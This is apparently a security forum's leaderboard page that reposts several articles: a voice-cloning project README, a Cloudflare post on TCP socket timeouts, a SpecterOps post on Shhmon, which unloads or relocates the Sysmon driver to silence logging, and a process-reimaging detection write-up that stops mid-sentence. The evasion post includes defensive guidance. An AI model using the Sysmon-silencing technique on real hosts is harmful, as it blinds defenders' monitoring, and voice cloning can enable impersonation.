Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 09/23/19 in all areas

  1. Full Steam Ahead: Remotely Executing Code in Modern Desktop Application Architectures - Thomas Shadwell - INFILTRATE 2019
    2 points
  2. Real-Time Voice Cloning This repository is an implementation of Transfer Learning from Speaker Verification to Multispeaker Text-To-Speech Synthesis (SV2TTS) with a vocoder that works in real-time. Feel free to check my thesis if you're curious or if you're looking for info I haven't documented yet (don't hesitate to make an issue for that too). Mostly I would recommend giving a quick look to the figures beyond the introduction. SV2TTS is a three-stage deep learning framework that allows to create a numerical representation of a voice from a few seconds of audio, and to use it to condition a text-to-speech model trained to generalize to new voices. Video demonstration (click the picture): Papers implemented URL Designation Title Implementation source 1806.04558 SV2TTS Transfer Learning from Speaker Verification to Multispeaker Text-To-Speech Synthesis This repo 1802.08435 WaveRNN (vocoder) Efficient Neural Audio Synthesis fatchord/WaveRNN 1712.05884 Tacotron 2 (synthesizer) Natural TTS Synthesis by Conditioning Wavenet on Mel Spectrogram Predictions Rayhane-mamah/Tacotron-2 1710.10467 GE2E (encoder) Generalized End-To-End Loss for Speaker Verification This repo News 20/08/19: I'm working on resemblyzer, an independent package for the voice encoder. You can use your trained encoder models from this repo with it. 06/07/19: Need to run within a docker container on a remote server? See here. 25/06/19: Experimental support for low-memory GPUs (~2gb) added for the synthesizer. Pass --low_mem to demo_cli.py or demo_toolbox.py to enable it. It adds a big overhead, so it's not recommended if you have enough VRAM. Quick start Requirements You will need the following whether you plan to use the toolbox only or to retrain the models. Python 3.7. Python 3.6 might work too, but I wouldn't go lower because I make extensive use of pathlib. Run pip install -r requirements.txt to install the necessary packages. Additionally you will need PyTorch (>=1.0.1). A GPU is mandatory, but you don't necessarily need a high tier GPU if you only want to use the toolbox. Pretrained models Download the latest here. Preliminary Before you download any dataset, you can begin by testing your configuration with: python demo_cli.py If all tests pass, you're good to go. Datasets For playing with the toolbox alone, I only recommend downloading LibriSpeech/train-clean-100. Extract the contents as <datasets_root>/LibriSpeech/train-clean-100 where <datasets_root> is a directory of your choosing. Other datasets are supported in the toolbox, see here. You're free not to download any dataset, but then you will need your own data as audio files or you will have to record it with the toolbox. Toolbox You can then try the toolbox: python demo_toolbox.py -d <datasets_root> or python demo_toolbox.py depending on whether you downloaded any datasets. If you are running an X-server or if you have the error Aborted (core dumped), see this issue. Wiki How it all works (WIP - stub, you might be better off reading my thesis until it's done) Training models yourself Training with other data/languages (WIP - see here for now) TODO and planned features Contribution Feel free to open issues or PRs for any problem you may encounter, typos that you see or aspects that are confusing. I try to reply to every issue. I'm working full-time as of June 2019. I won't be making progress of my own on this repo, but I will still gladly merge PRs and accept contributions to the wiki. Don't hesitate to send me an email if you wish to contribute. Sursa: https://github.com/CorentinJ/Real-Time-Voice-Cloning
    1 point
  3. When TCP sockets refuse to die Marek Majkowski September 20, 2019 3:53PM While working on our Spectrum server, we noticed something weird: the TCP sockets which we thought should have been closed were lingering around. We realized we don't really understand when TCP sockets are supposed to time out! Image by Sergiodc2 CC BY SA 3.0 In our code, we wanted to make sure we don't hold connections to dead hosts. In our early code we naively thought enabling TCP keepalives would be enough... but it isn't. It turns out a fairly modern TCP_USER_TIMEOUT socket option is equally as important. Furthermore it interacts with TCP keepalives in subtle ways. Many people are confused by this. In this blog post, we'll try to show how these options work. We'll show how a TCP socket can timeout during various stages of its lifetime, and how TCP keepalives and user timeout influence that. To better illustrate the internals of TCP connections, we'll mix the outputs of the tcpdump and the ss -o commands. This nicely shows the transmitted packets and the changing parameters of the TCP connections. SYN-SENT Let's start from the simplest case - what happens when one attempts to establish a connection to a server which discards inbound SYN packets? The scripts used here are available on our Github. $ sudo ./test-syn-sent.py # all packets dropped 00:00.000 IP host.2 > host.1: Flags [S] # initial SYN State Recv-Q Send-Q Local:Port Peer:Port SYN-SENT 0 1 host:2 host:1 timer:(on,940ms,0) 00:01.028 IP host.2 > host.1: Flags [S] # first retry 00:03.044 IP host.2 > host.1: Flags [S] # second retry 00:07.236 IP host.2 > host.1: Flags [S] # third retry 00:15.427 IP host.2 > host.1: Flags [S] # fourth retry 00:31.560 IP host.2 > host.1: Flags [S] # fifth retry 01:04.324 IP host.2 > host.1: Flags [S] # sixth retry 02:10.000 connect ETIMEDOUT Ok, this was easy. After the connect() syscall, the operating system sends a SYN packet. Since it didn't get any response the OS will by default retry sending it 6 times. This can be tweaked by the sysctl: $ sysctl net.ipv4.tcp_syn_retries net.ipv4.tcp_syn_retries = 6 It's possible to overwrite this setting per-socket with the TCP_SYNCNT setsockopt: setsockopt(sd, IPPROTO_TCP, TCP_SYNCNT, 6); The retries are staggered at 1s, 3s, 7s, 15s, 31s, 63s marks (the inter-retry time starts at 2s and then doubles each time). By default the whole process takes 130 seconds, until the kernel gives up with the ETIMEDOUT errno. At this moment in the lifetime of a connection, SO_KEEPALIVE settings are ignored, but TCP_USER_TIMEOUT is not. For example, setting it to 5000ms, will cause the following interaction: $ sudo ./test-syn-sent.py 5000 # all packets dropped 00:00.000 IP host.2 > host.1: Flags [S] # initial SYN State Recv-Q Send-Q Local:Port Peer:Port SYN-SENT 0 1 host:2 host:1 timer:(on,996ms,0) 00:01.016 IP host.2 > host.1: Flags [S] # first retry 00:03.032 IP host.2 > host.1: Flags [S] # second retry 00:05.016 IP host.2 > host.1: Flags [S] # what is this? 00:05.024 IP host.2 > host.1: Flags [S] # what is this? 00:05.036 IP host.2 > host.1: Flags [S] # what is this? 00:05.044 IP host.2 > host.1: Flags [S] # what is this? 00:05.050 connect ETIMEDOUT Even though we set user-timeout to 5s, we still saw the six SYN retries on the wire. This behaviour is probably a bug (as tested on 5.2 kernel): we would expect only two retries to be sent - at 1s and 3s marks and the socket to expire at 5s mark. Instead we saw this, but also we saw further 4 retransmitted SYN packets aligned to 5s mark - which makes no sense. Anyhow, we learned a thing - the TCP_USER_TIMEOUT does affect the behaviour of connect(). SYN-RECV SYN-RECV sockets are usually hidden from the application. They live as mini-sockets on the SYN queue. We wrote about the SYN and Accept queues in the past. Sometimes, when SYN cookies are enabled, the sockets may skip the SYN-RECV state altogether. In SYN-RECV state, the socket will retry sending SYN+ACK 5 times as controlled by: $ sysctl net.ipv4.tcp_synack_retries net.ipv4.tcp_synack_retries = 5 Here is how it looks on the wire: $ sudo ./test-syn-recv.py 00:00.000 IP host.2 > host.1: Flags [S] # all subsequent packets dropped 00:00.000 IP host.1 > host.2: Flags [S.] # initial SYN+ACK State Recv-Q Send-Q Local:Port Peer:Port SYN-RECV 0 0 host:1 host:2 timer:(on,996ms,0) 00:01.033 IP host.1 > host.2: Flags [S.] # first retry 00:03.045 IP host.1 > host.2: Flags [S.] # second retry 00:07.301 IP host.1 > host.2: Flags [S.] # third retry 00:15.493 IP host.1 > host.2: Flags [S.] # fourth retry 00:31.621 IP host.1 > host.2: Flags [S.] # fifth retry 01:04:610 SYN-RECV disappears With default settings, the SYN+ACK is re-transmitted at 1s, 3s, 7s, 15s, 31s marks, and the SYN-RECV socket disappears at the 64s mark. Neither SO_KEEPALIVE nor TCP_USER_TIMEOUT affect the lifetime of SYN-RECV sockets. Final handshake ACK After receiving the second packet in the TCP handshake - the SYN+ACK - the client socket moves to an ESTABLISHED state. The server socket remains in SYN-RECV until it receives the final ACK packet. Losing this ACK doesn't change anything - the server socket will just take a bit longer to move from SYN-RECV to ESTAB. Here is how it looks: 00:00.000 IP host.2 > host.1: Flags [S] 00:00.000 IP host.1 > host.2: Flags [S.] 00:00.000 IP host.2 > host.1: Flags [.] # initial ACK, dropped State Recv-Q Send-Q Local:Port Peer:Port SYN-RECV 0 0 host:1 host:2 timer:(on,1sec,0) ESTAB 0 0 host:2 host:1 00:01.014 IP host.1 > host.2: Flags [S.] 00:01.014 IP host.2 > host.1: Flags [.] # retried ACK, dropped State Recv-Q Send-Q Local:Port Peer:Port SYN-RECV 0 0 host:1 host:2 timer:(on,1.012ms,1) ESTAB 0 0 host:2 host:1 As you can see SYN-RECV, has the "on" timer, the same as in example before. We might argue this final ACK doesn't really carry much weight. This thinking lead to the development of TCP_DEFER_ACCEPT feature - it basically causes the third ACK to be silently dropped. With this flag set the socket remains in SYN-RECV state until it receives the first packet with actual data: $ sudo ./test-syn-ack.py 00:00.000 IP host.2 > host.1: Flags [S] 00:00.000 IP host.1 > host.2: Flags [S.] 00:00.000 IP host.2 > host.1: Flags [.] # delivered, but the socket stays as SYN-RECV State Recv-Q Send-Q Local:Port Peer:Port SYN-RECV 0 0 host:1 host:2 timer:(on,7.192ms,0) ESTAB 0 0 host:2 host:1 00:08.020 IP host.2 > host.1: Flags [P.], length 11 # payload moves the socket to ESTAB State Recv-Q Send-Q Local:Port Peer:Port ESTAB 11 0 host:1 host:2 ESTAB 0 0 host:2 host:1 The server socket remained in the SYN-RECV state even after receiving the final TCP-handshake ACK. It has a funny "on" timer, with the counter stuck at 0 retries. It is converted to ESTAB - and moved from the SYN to the accept queue - after the client sends a data packet or after the TCP_DEFER_ACCEPT timer expires. Basically, with DEFER ACCEPT the SYN-RECV mini-socket discards the data-less inbound ACK. Idle ESTAB is forever Let's move on and discuss a fully-established socket connected to an unhealthy (dead) peer. After completion of the handshake, the sockets on both sides move to the ESTABLISHED state, like: State Recv-Q Send-Q Local:Port Peer:Port ESTAB 0 0 host:2 host:1 ESTAB 0 0 host:1 host:2 These sockets have no running timer by default - they will remain in that state forever, even if the communication is broken. The TCP stack will notice problems only when one side attempts to send something. This raises a question - what to do if you don't plan on sending any data over a connection? How do you make sure an idle connection is healthy, without sending any data over it? This is where TCP keepalives come in. Let's see it in action - in this example we used the following toggles: SO_KEEPALIVE = 1 - Let's enable keepalives. TCP_KEEPIDLE = 5 - Send first keepalive probe after 5 seconds of idleness. TCP_KEEPINTVL = 3 - Send subsequent keepalive probes after 3 seconds. TCP_KEEPCNT = 3 - Time out after three failed probes. $ sudo ./test-idle.py 00:00.000 IP host.2 > host.1: Flags [S] 00:00.000 IP host.1 > host.2: Flags [S.] 00:00.000 IP host.2 > host.1: Flags [.] State Recv-Q Send-Q Local:Port Peer:Port ESTAB 0 0 host:1 host:2 ESTAB 0 0 host:2 host:1 timer:(keepalive,2.992ms,0) # all subsequent packets dropped 00:05.083 IP host.2 > host.1: Flags [.], ack 1 # first keepalive probe 00:08.155 IP host.2 > host.1: Flags [.], ack 1 # second keepalive probe 00:11.231 IP host.2 > host.1: Flags [.], ack 1 # third keepalive probe 00:14.299 IP host.2 > host.1: Flags [R.], seq 1, ack 1 Indeed! We can clearly see the first probe sent at the 5s mark, two remaining probes 3s apart - exactly as we specified. After a total of three sent probes, and a further three seconds of delay, the connection dies with ETIMEDOUT, and final the RST is transmitted. For keepalives to work, the send buffer must be empty. You can notice the keepalive timer active in the "timer:(keepalive)" line. Keepalives with TCP_USER_TIMEOUT are confusing We mentioned the TCP_USER_TIMEOUT option before. It sets the maximum amount of time that transmitted data may remain unacknowledged before the kernel forcefully closes the connection. On its own, it doesn't do much in the case of idle connections. The sockets will remain ESTABLISHED even if the connectivity is dropped. However, this socket option does change the semantics of TCP keepalives. The tcp(7) manpage is somewhat confusing: Moreover, when used with the TCP keepalive (SO_KEEPALIVE) option, TCP_USER_TIMEOUT will override keepalive to determine when to close a connection due to keepalive failure. The original commit message has slightly more detail: tcp: Add TCP_USER_TIMEOUT socket option To understand the semantics, we need to look at the kernel code in linux/net/ipv4/tcp_timer.c:693: if ((icsk->icsk_user_timeout != 0 && elapsed >= msecs_to_jiffies(icsk->icsk_user_timeout) && icsk->icsk_probes_out > 0) || For the user timeout to have any effect, the icsk_probes_out must not be zero. The check for user timeout is done only after the first probe went out. Let's check it out. Our connection settings: TCP_USER_TIMEOUT = 5*1000 - 5 seconds SO_KEEPALIVE = 1 - enable keepalives TCP_KEEPIDLE = 1 - send first probe quickly - 1 second idle TCP_KEEPINTVL = 11 - subsequent probes every 11 seconds TCP_KEEPCNT = 3 - send three probes before timing out 00:00.000 IP host.2 > host.1: Flags [S] 00:00.000 IP host.1 > host.2: Flags [S.] 00:00.000 IP host.2 > host.1: Flags [.] # all subsequent packets dropped 00:01.001 IP host.2 > host.1: Flags [.], ack 1 # first probe 00:12.233 IP host.2 > host.1: Flags [R.] # timer for second probe fired, socket aborted due to TCP_USER_TIMEOUT So what happened? The connection sent the first keepalive probe at the 1s mark. Seeing no response the TCP stack then woke up 11 seconds later to send a second probe. This time though, it executed the USER_TIMEOUT code path, which decided to terminate the connection immediately. What if we bump TCP_USER_TIMEOUT to larger values, say between the second and third probe? Then, the connection will be closed on the third probe timer. With TCP_USER_TIMEOUT set to 12.5s: 00:01.022 IP host.2 > host.1: Flags [.] # first probe 00:12.094 IP host.2 > host.1: Flags [.] # second probe 00:23.102 IP host.2 > host.1: Flags [R.] # timer for third probe fired, socket aborted due to TCP_USER_TIMEOUT We’ve shown how TCP_USER_TIMEOUT interacts with keepalives for small and medium values. The last case is when TCP_USER_TIMEOUT is extraordinarily large. Say we set it to 30s: 00:01.027 IP host.2 > host.1: Flags [.], ack 1 # first probe 00:12.195 IP host.2 > host.1: Flags [.], ack 1 # second probe 00:23.207 IP host.2 > host.1: Flags [.], ack 1 # third probe 00:34.211 IP host.2 > host.1: Flags [.], ack 1 # fourth probe! But TCP_KEEPCNT was only 3! 00:45.219 IP host.2 > host.1: Flags [.], ack 1 # fifth probe! 00:56.227 IP host.2 > host.1: Flags [.], ack 1 # sixth probe! 01:07.235 IP host.2 > host.1: Flags [R.], seq 1 # TCP_USER_TIMEOUT aborts conn on 7th probe timer We saw six keepalive probes on the wire! With TCP_USER_TIMEOUT set, the TCP_KEEPCNT is totally ignored. If you want TCP_KEEPCNT to make sense, the only sensible USER_TIMEOUT value is slightly smaller than: TCP_KEEPIDLE + TCP_KEEPINTVL * TCP_KEEPCNT Busy ESTAB socket is not forever Thus far we have discussed the case where the connection is idle. Different rules apply when the connection has unacknowledged data in a send buffer. Let's prepare another experiment - after the three-way handshake, let's set up a firewall to drop all packets. Then, let's do a send on one end to have some dropped packets in-flight. An experiment shows the sending socket dies after ~16 minutes: 00:00.000 IP host.2 > host.1: Flags [S] 00:00.000 IP host.1 > host.2: Flags [S.] 00:00.000 IP host.2 > host.1: Flags [.] # All subsequent packets dropped 00:00.206 IP host.2 > host.1: Flags [P.], length 11 # first data packet 00:00.412 IP host.2 > host.1: Flags [P.], length 11 # early retransmit, doesn't count 00:00.620 IP host.2 > host.1: Flags [P.], length 11 # 1st retry 00:01.048 IP host.2 > host.1: Flags [P.], length 11 # 2nd retry 00:01.880 IP host.2 > host.1: Flags [P.], length 11 # 3rd retry State Recv-Q Send-Q Local:Port Peer:Port ESTAB 0 0 host:1 host:2 ESTAB 0 11 host:2 host:1 timer:(on,1.304ms,3) 00:03.543 IP host.2 > host.1: Flags [P.], length 11 # 4th 00:07.000 IP host.2 > host.1: Flags [P.], length 11 # 5th 00:13.656 IP host.2 > host.1: Flags [P.], length 11 # 6th 00:26.968 IP host.2 > host.1: Flags [P.], length 11 # 7th 00:54.616 IP host.2 > host.1: Flags [P.], length 11 # 8th 01:47.868 IP host.2 > host.1: Flags [P.], length 11 # 9th 03:34.360 IP host.2 > host.1: Flags [P.], length 11 # 10th 05:35.192 IP host.2 > host.1: Flags [P.], length 11 # 11th 07:36.024 IP host.2 > host.1: Flags [P.], length 11 # 12th 09:36.855 IP host.2 > host.1: Flags [P.], length 11 # 13th 11:37.692 IP host.2 > host.1: Flags [P.], length 11 # 14th 13:38.524 IP host.2 > host.1: Flags [P.], length 11 # 15th 15:39.500 connection ETIMEDOUT The data packet is retransmitted 15 times, as controlled by: $ sysctl net.ipv4.tcp_retries2 net.ipv4.tcp_retries2 = 15 From the ip-sysctl.txt documentation: The default value of 15 yields a hypothetical timeout of 924.6 seconds and is a lower bound for the effective timeout. TCP will effectively time out at the first RTO which exceeds the hypothetical timeout. The connection indeed died at ~940 seconds. Notice the socket has the "on" timer running. It doesn't matter at all if we set SO_KEEPALIVE - when the "on" timer is running, keepalives are not engaged. TCP_USER_TIMEOUT keeps on working though. The connection will be aborted exactly after user-timeout specified time since the last received packet. With the user timeout set the tcp_retries2 value is ignored. Zero window ESTAB is... forever? There is one final case worth mentioning. If the sender has plenty of data, and the receiver is slow, then TCP flow control kicks in. At some point the receiver will ask the sender to stop transmitting new data. This is a slightly different condition than the one described above. In this case, with flow control engaged, there is no in-flight or unacknowledged data. Instead the receiver throttles the sender with a "zero window" notification. Then the sender periodically checks if the condition is still valid with "window probes". In this experiment we reduced the receive buffer size for simplicity. Here's how it looks on the wire: 00:00.000 IP host.2 > host.1: Flags [S] 00:00.000 IP host.1 > host.2: Flags [S.], win 1152 00:00.000 IP host.2 > host.1: Flags [.] 00:00.202 IP host.2 > host.1: Flags [.], length 576 # first data packet 00:00.202 IP host.1 > host.2: Flags [.], ack 577, win 576 00:00.202 IP host.2 > host.1: Flags [P.], length 576 # second data packet 00:00.244 IP host.1 > host.2: Flags [.], ack 1153, win 0 # throttle it! zero-window 00:00.456 IP host.2 > host.1: Flags [.], ack 1 # zero-window probe 00:00.456 IP host.1 > host.2: Flags [.], ack 1153, win 0 # nope, still zero-window State Recv-Q Send-Q Local:Port Peer:Port ESTAB 1152 0 host:1 host:2 ESTAB 0 129920 host:2 host:1 timer:(persist,048ms,0) The packet capture shows a couple of things. First, we can see two packets with data, each 576 bytes long. They both were immediately acknowledged. The second ACK had "win 0" notification: the sender was told to stop sending data. But the sender is eager to send more! The last two packets show a first "window probe": the sender will periodically send payload-less "ack" packets to check if the window size had changed. As long as the receiver keeps on answering, the sender will keep on sending such probes forever. The socket information shows three important things: The read buffer of the reader is filled - thus the "zero window" throttling is expected. The write buffer of the sender is filled - we have more data to send. The sender has a "persist" timer running, counting the time until the next "window probe". In this blog post we are interested in timeouts - what will happen if the window probes are lost? Will the sender notice? By default the window probe is retried 15 times - adhering to the usual tcp_retries2 setting. The tcp timer is in persist state, so the TCP keepalives will not be running. The SO_KEEPALIVE settings don't make any difference when window probing is engaged. As expected, the TCP_USER_TIMEOUT toggle keeps on working. A slight difference is that similarly to user-timeout on keepalives, it's engaged only when the retransmission timer fires. During such an event, if more than user-timeout seconds since the last good packet passed, the connection will be aborted. Note about using application timeouts In the past we have shared an interesting war story: The curious case of slow downloads Our HTTP server gave up on the connection after an application-managed timeout fired. This was a bug - a slow connection might have correctly slowly drained the send buffer, but the application server didn't notice that. We abruptly dropped slow downloads, even though this wasn't our intention. We just wanted to make sure the client connection was still healthy. It would be better to use TCP_USER_TIMEOUT than rely on application-managed timeouts. But this is not sufficient. We also wanted to guard against a situation where a client stream is valid, but is stuck and doesn't drain the connection. The only way to achieve this is to periodically check the amount of unsent data in the send buffer, and see if it shrinks at a desired pace. For typical applications sending data to the Internet, I would recommend: Enable TCP keepalives. This is needed to keep some data flowing in the idle-connection case. Set TCP_USER_TIMEOUT to TCP_KEEPIDLE + TCP_KEEPINTVL * TCP_KEEPCNT. Be careful when using application-managed timeouts. To detect TCP failures use TCP keepalives and user-timeout. If you want to spare resources and make sure sockets don't stay alive for too long, consider periodically checking if the socket is draining at the desired pace. You can use ioctl(TIOCOUTQ) for that, but it counts both data buffered (notsent) on the socket and in-flight (unacknowledged) bytes. A better way is to use TCP_INFO tcpi_notsent_bytes parameter, which reports only the former counter. An example of checking the draining pace: while True: notsent1 = get_tcp_info(c).tcpi_notsent_bytes notsent1_ts = time.time() ... poll.poll(POLL_PERIOD) ... notsent2 = get_tcp_info(c).tcpi_notsent_bytes notsent2_ts = time.time() pace_in_bytes_per_second = (notsent1 - notsent2) / (notsent2_ts - notsent1_ts) if pace_in_bytes_per_second > 12000: # pace is above effective rate of 96Kbps, ok! else: # socket is too slow... There are ways to further improve this logic. We could use TCP_NOTSENT_LOWAT, although it's generally only useful for situations where the send buffer is relatively empty. Then we could use the SO_TIMESTAMPING interface for notifications about when data gets delivered. Finally, if we are done sending the data to the socket, it's possible to just call close() and defer handling of the socket to the operating system. Such a socket will be stuck in FIN-WAIT-1 or LAST-ACK state until it correctly drains. Summary In this post we discussed five cases where the TCP connection may notice the other party going away: SYN-SENT: The duration of this state can be controlled by TCP_SYNCNT or tcp_syn_retries. SYN-RECV: It's usually hidden from application. It is tuned by tcp_synack_retries. Idling ESTABLISHED connection, will never notice any issues. A solution is to use TCP keepalives. Busy ESTABLISHED connection, adheres to tcp_retries2 setting, and ignores TCP keepalives. Zero-window ESTABLISHED connection, adheres to tcp_retries2 setting, and ignores TCP keepalives. Especially the last two ESTABLISHED cases can be customized with TCP_USER_TIMEOUT, but this setting also affects other situations. Generally speaking, it can be thought of as a hint to the kernel to abort the connection after so-many seconds since the last good packet. This is a dangerous setting though, and if used in conjunction with TCP keepalives should be set to a value slightly lower than TCP_KEEPIDLE + TCP_KEEPINTVL * TCP_KEEPCNT. Otherwise it will affect, and potentially cancel out, the TCP_KEEPCNT value. In this post we presented scripts showing the effects of timeout-related socket options under various network conditions. Interleaving the tcpdump packet capture with the output of ss -o is a great way of understanding the networking stack. We were able to create reproducible test cases showing the "on", "keepalive" and "persist" timers in action. This is a very useful framework for further experimentation. Finally, it's surprisingly hard to tune a TCP connection to be confident that the remote host is actually up. During our debugging we found that looking at the send buffer size and currently active TCP timer can be very helpful in understanding whether the socket is actually healthy. The bug in our Spectrum application turned out to be a wrong TCP_USER_TIMEOUT setting - without it sockets with large send buffers were lingering around for way longer than we intended. The scripts used in this article can be found on our Github. Figuring this out has been a collaboration across three Cloudflare offices. Thanks to Hiren Panchasara from San Jose, Warren Nelson from Austin and Jakub Sitnicki from Warsaw. Fancy joining the team? Apply here! Sursa: https://blog.cloudflare.com/when-tcp-sockets-refuse-to-die/
    1 point
  4. Shhmon — Silencing Sysmon via Driver Unload Matt Hand Follow Sep 18 · 4 min read Sysmon is an incredibly powerful tool to aide in data collection beyond Windows’ standard event logging capabilities. It presents a significant challenge for us as attackers as it has the ability to detect many indicators that we generate during operations, such as process creation, registry changes, file creation, among many other things. Sysmon is comprised of 2 main pieces — a system service and a driver. The driver provides the service with information which is processed for consumption by the user. Both the service and the driver’s names can be changed from their defaults to obfuscate the fact that Sysmon is running on the host. Today I am releasing Shhmon, a C# tool to challenge the assumption that our defensive tools are functioning as intended. This also introduces a situation where the Sysmon driver has been unloaded by a user without fltMC.exe and the service is still running. https://github.com/matterpreter/Shhmon Despite being able to rename the Sysmon driver during installation (Sysmon.exe -i -d $DriverName), it is loaded at a predefined altitude of 385201 at installation. A driver altitude is a unique identifier allocated by Microsoft indicating the driver’s position relative to others in the file systems stack. Think of this as a driver’s assigned parking spot. Each driver has a reserved spot where it is supposed to park. The driver should abide by this allocation. We can use functions supplied in fltlib.dll (FilterFindFirst() and FilterFindNext()) to hunt for a driver at 385201 & unload it. This is similar to the functionality behind fltMC.exe unload $DriverName , but allows us to evade command line logging which would be captured by Sysmon before the driver is unloaded. In order to unload the driver, the current process token needs to have SeLoadDriverPrivileges enabled, which Shhmon grants to itself using advapi32!AdjustTokenPrivileges. Defensive Guidance This technique generates interesting events worth investigating and correlating. Sysmon Event ID 255 Once the driver is unloaded, an error event with an ID of DriverCommunication will be generated. After this error occurs, logs will no longer be collected and parsed by Sysmon. Windows System Event ID 1 This event will also be generated on unload from the source “FilterManager” stating File System Filter <DriverName\> (Version 0.0, <Timestamp>) unloaded successfully. This event was not observed to be generated during a normal system restart. Windows Security Event ID 4672 In order to unload the driver, our Shhmon process needs to be granted SeLoadDriverPrivileges. During testing, this permission was only sporadically granted to NT AUTHORITY\SYSTEM and is not a part of its standard permission set. Sysmon Event ID 1/Windows Security Event ID 4688 Despite the intent of evading command line logging by using the API, the calling process will still be logged. An abnormal, high integrity process which is assigned SeLoadDriverPrivilege could be correlated with the above events to serve as a starting point for hunting. Bear in mind that this assembly could be used via something like Cobalt Strike’s execute-assembly functionality, where a seemingly innocuous binary would be the calling process. Going beyond these, I have found that Sysmon’s driver’s altitude can be changed via the registry. reg add "HKLM\SYSTEM\CurrentControlSet\Services\<DriverName>\Instances\Sysmon Instance" /v Altitude /t REG_SZ /d 31337 When the system is rebooted, the driver will be reloaded at the newly specified altitude. Sysmon with a non-default driver name running at altitude 31337 The new altitude could be discovered by reading the registry key HKLM:\SYSTEM\CurrentControlSet\Services\*\Instances\Sysmon Instance\Altitude, but this adds an additional layer of obfuscation which will need to be accounted for by an attacker. Note: I have found during testing that if the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot. Additionally, there may be an opportunity to audit a handle opening on the \\.\FltMgr device object, which is done by fltlib!FilterUnload, by applying a SACL to the device object. Many thanks Matt Graeber and Brian Reitz for helping me hone in on these. References: Research inspiration from @Carlos_Perez’s post describing this tactic, as well as Matt Graeber and Lee Christensen’s Black Hat USA 2018 white paper. Alexsey Kabanov’s LazyCopy minifilter for demonstrating the marshaling of filter information and their method for creating resizable buffers. Posts By SpecterOps Team Members Written by Matt Hand I like red teaming, picking up heavy things, and burritos. Adversary Simulation @ SpecterOps. github.com/matterpreter Sursa: https://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650
    1 point
  5. You Can Run, But You Can’t Hide — Detecting Process Reimaging Behavior Jonathan Johnson Follow Sep 16 · 9 min read Background: Around 3 months ago, a new attack technique was introduced to the InfoSec community known as “Process Reimaging.” This technique was released by the McAfee Security team in a blog titled — “In NTDLL I Trust — Process Reimaging and Endpoint Security Solution Bypass.” A few days after this attack technique was released, a co-worker and friend of mine — Dwight Hohnstein — came out with proof of concept code demonstrating this technique, which can be found on his GitHub. While this technique isn’t yet mapped to MITRE ATT&CK, I believe it would fall under the Defense Evasion Tactic. Although the purpose of this blog post is to show the methodology used to build a detection for this attack, it assumes you have read the blog released by the McAfee team and have looked at Dwight’s proof of concept code. A brief high level outline of the attack is as follows: Process Reimaging is an attack technique that leverages inconsistencies in how the Windows Operating System determines process image FILE_OBJECT locations. This means that an attacker can drop a binary on disk and hide the physical location of that file by replacing its initial execution full file path with a trusted binary. This in turn allows an adversary to bypass Windows operating system process attribute verification, hiding themselves in the context of the process image of their choosing. There are three stages involved in this attack: A binary dropped to disk — This assumes breach and that the attacker can drop a binary to disk. Undetected binary loaded. This will be the original image loaded after process creation. The malicious binary is “reimaged” to a known good binary they’d like to appear as. This is achievable because the Virtual Address Descriptors (VADs) don’t update when the image is renamed. Consequently, this allows the wrong process image file information to be returned when queried by applications. This allows an adversary the opportunity to defensively evade detection efforts by analysts and incident responders. Too often organizations are not collecting the “right” data. Often, the data is unstructured, gratuitous, and lacking the substantive details required to arrive at a conclusion. Without quality data, organizations are potentially blind to techniques being ran across their environment. Moreover, by relying too heavily on the base configurations of EDR products (i.e. Windows Defender, etc.) you yield the fine-grained details of detection to a third party which may or may not use the correct function calls to detect this malicious activity (such as the case of GetMappedFileName properly detecting this reimaging). Based off of these factors, this attack allows the adversary to successfully evade detection. For further context and information on this attack, check out the Technical Deep Dive portion in the original blog post on this topic. Note: GetMappedFileName is an API that is used by applications to query process information. It checks whether the address requested is within a memory-mapped file in the address space of the specified process. If the address is within the memory-mapped file it will return the name of the memory-mapped file. This API requires PROCESS_QUERY_INFORMATION and PROCESS_VM_READ access rights. , any time a handle has the access rights PROCESS_QUERY_INFORMATION, it is also granted PROCESS_QUERY_LIMITED_INFORMATION. Those access rights have bitmask 0x1010. This may look familiar, as that is one of the desired access rights used by Mimikatz. Matt Graeber brought to my attention that this is the source of many false positives when trying to detect suspicious access to LSASS based on granted access. Transparency: When this attack was released I spent a Saturday creating a hunt hypothesis, going through the behavioral aspects of the data, and finding its relationships. When reviewing Dwight’s POC I noticed Win32 API calls in the code, and from those I was positive I could correlate those API calls to specific events. because like many defenders I made assumptions regarding EDR products and their logging capabilities. Without a known API to Event ID mapping, I started to map these calls myself. I began (and continue to work on) the Sysmon side of the mapping. This involves reverse engineering the Sysmon driver to map API calls to Event Registration Mechanisms to Event ID’s. Huge shoutout to Matt Graeber, for helping me in this quest and taking the time to teach me the process of reverse engineering. Creating this mapping was a key part of the Detection Strategy that I implemented and would not have been possible without it. Process Reimaging Detection: Detection Methodology: The methodology that was used for this detection is as follows: Read the technical write up of the Process Reimaging attack. Read through Dwight’s POC code. Gain knowledge on how the attack executes, create relationships between data and the behavior of the attack. Execute the attack. Apply the research knowledge with the data relationships to make a robust detection. Detection Walk Through When walking through the Technical Deep Dive portion of the blog, this stood out to me: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/in-ntdll-i-trust-process-reimaging-and-endpoint-security-solution-bypass/ The picture above shows a couple of API calls that were used that particularly piqued my interest. LoadLibrary CreateProcess Based on my research inside of the Sysmon Driver, both of these API calls are funneled through an event registration mechanism. This mechanism is then called upon by the Sysmon Driver using the requisite Input/Output Interface Control (IOCTL) codes to query the data. The queried data will then be pulled back into the Sysmon Binary which then produces the correlating Event ID. For both of the API calls above their correlating processes are shown below: Mapping of Sysmon Event ID 1:Process Creation Mapping of Sysmon Event ID 7:Image Loaded Based off of this research and the technical deep dive section in the McAffee article, I know exactly what data will be generated when this attack is performed. Sysmon should have an Event ID 7 for each call to LoadLibrary, and an Event ID 1 for the call to CreateProcess; however, how do I turn data into actionable data? Data that a threat hunter can easily use and manipulate to suit their needs? To do this, we focus on Data Standardization and Data Quality. Data Quality is derived from Data Standardization. Data Standardization is the process of transforming data into a common readable format that can then be easily analyzed. Data Quality is the process of making sure the environment is collecting the correct data, which can then be rationalized to specific attack techniques. This can be achieved by understanding the behavior of non-malicious data and creating behavioral correlations of the data provided during this attack. For example, when a process is created the OriginalFileName (a relatively new addition to Sysmon) should match the Image section within Sysmon Event ID 1. Say you wanted to launch PowerShell, when you launch PowerShell the OriginalFileName will be Powershell.EXE and the Image will be C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe. When these two things don’t match it is possibly an indicator of 